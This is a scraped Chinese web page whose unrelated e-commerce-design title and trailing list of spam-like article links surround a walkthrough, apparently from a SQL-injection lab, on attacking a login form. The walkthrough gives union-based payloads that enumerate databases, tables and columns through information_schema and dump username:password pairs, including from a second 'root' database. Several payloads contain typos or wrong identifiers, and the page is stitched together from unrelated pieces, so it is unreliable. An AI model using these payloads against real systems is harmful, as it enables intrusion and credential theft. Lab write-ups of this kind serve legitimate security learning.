当前位置: 首页 > news >正文

电子商务网站设计岗位主要是把网站做静态化

电子商务网站设计岗位主要是,把网站做静态化,基础建设的网站有哪些内容,南宁网站外包知识点: 发现登录框就可以尝试注入登录框一般都是字符型注入通过注入可以获取其他表的信息绕过手段 单引号闭合联合注入也可以进行错误注入 首先看界面是一个登录框;通过admin admin登录进去,发现页面会把用户名和密码的登录信息打印出来&am…

知识点:

  • 发现登录框就可以尝试注入
  • 登录框一般都是字符型注入
  • 通过注入可以获取其他表的信息
  • 绕过手段
    • 单引号闭合+联合注入
    • 也可以进行错误注入

首先看界面是一个登录框;通过admin admin登录进去,发现页面会把用户名和密码的登录信息打印出来;通过bp抓包进行测试是不是存在注入点

开始测试

构造payload:username=a'+or+1=1#

页面成功回显除了第一个用户名和密码;说明这里存在字符型注入;通过单引号闭合进行绕过

既然页面有回显可以尝试进行联合注入(尝试先用3个字段,前几关的经验)

构造payload:username=a'+unoion+select+1,2,3#

提示字段数不对,根据页面返回情况猜测是两个字段

构造payload:username=a'+union+select+1,2#

页面成功回显除了输入的信息;说明注入成功;下面可以进行数据库敏感信息的获取了

联合注入成功,获取数据库名

构造payload:username=a'+union+select+1,database()#

成功获取了数据库名

接下来获取数据库下的表名

构造payload:username=a'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='security'#

成功获取了security下的表名;

接下来获取users表中的所有字段名;

构造payload:username=a'+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users'#

成功获取了相关的字段;发现里面有用户名和密码

接下来获取相关的数据信息(用户名和密码)

构造payload:username=a'+union+select+1,group_concat(username,':',password)+from+users#

这里直接用users表名了;因为当前默认使用的数据库是security;所有加不加都可以;如果不知道的情况下最好加上;如security.users

成功获取了用户的敏感信息

到这里其实就完成了;不需要在进行其他操作了但是我想测一下是不是能够读取其他数据库的信息

番外

接着进行操作;获取所有数据库名

构造payload:username=a'+group_concat(schema_name)+from+information_schema.schemata#

成功获取了所有的数据库信息;发现了一个root数据库

尝试获取root数据库的表名

构造payload:username=a'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_security='root'#

成功获取了所有的表名;发现有一个用户表

尝试读取users表的字段信息

构造payload:username=a'+union+select+1,group_concat(column_name)+from+information_schema.tables+where+table_schema='root'+and+table_name='users'#

成功获取users表中的字段信息

发现存在用户名和密码的字段

接下来对用户名和密码进行读取

构造payload:username=a'+union+select+1,grroup_concat(user,':',password)+from+root.users#

这里就要指定数据库了,因为默认是security数据库;通过指定root.users

成功获取了root表中的所有用户信息;可以看出密码进行加密了

到这里就真的结束了,真实畅快啊

10

http://www.yayakq.cn/news/160928/

相关文章:

  • 建站是什么意思宁波企业网站优化报价
  • 四川住房和城乡建设厅网站打不开新闻热点事件
  • 西安有哪些网站建设外包公司百度资源站长平台
  • 快速优化网站排名软件无为建设局网站
  • 工程建设网站怎么提交免签接口wordpress
  • 不关站备案wordpresswordpress 知更鸟 网格
  • 单页面网站怎么优化企业网站建设如何去规划
  • 广东省水利工程建设信息网站网站外链购买平台
  • 网站后台管理系统 asp抖音创作者服务平台
  • 网站怎么制作视频营销方向有哪些
  • 装修设计公司网站沧州大型企业网站建设
  • 社保减员要怎么做 国税局网站大型电商网站开发方案
  • 婚纱网站模板下载网站建设电话销售话术实例
  • php网站开发如何实现删除功能网络推广电话
  • 宁波城乡建设局管方网站武进做网站的公司
  • 法律对网站建设的规制东莞厚街核酸检测点
  • 做的网站在不同浏览器做企业网站需要用到的软件
  • 电商类网站怎么做推广网站可以做库存吗
  • 百度网站排名优化工具做网站f12的用处
  • 大型网站服务器多少钱简单的网站开发工具
  • 做网站 包含详情页设计吗视频网站开发前景
  • 南昌市做网站公司网页设计实验报告需求分析
  • 网站应用开发wordpress+模板宽度
  • 北京如何建设网站微信手机官方网站
  • 共享ip服务器做网站如何做企业推广
  • 响应式网站建设的未来发展wordpress5改回旧的编辑器
  • 青岛网页建站模板网站空间是服务器吗
  • 在线阅读小说网站怎么建设怎么免费搭建自己的网站
  • 中山建站关于php网站建设的优秀论文
  • 如何装修公司网站php网站建设思路方案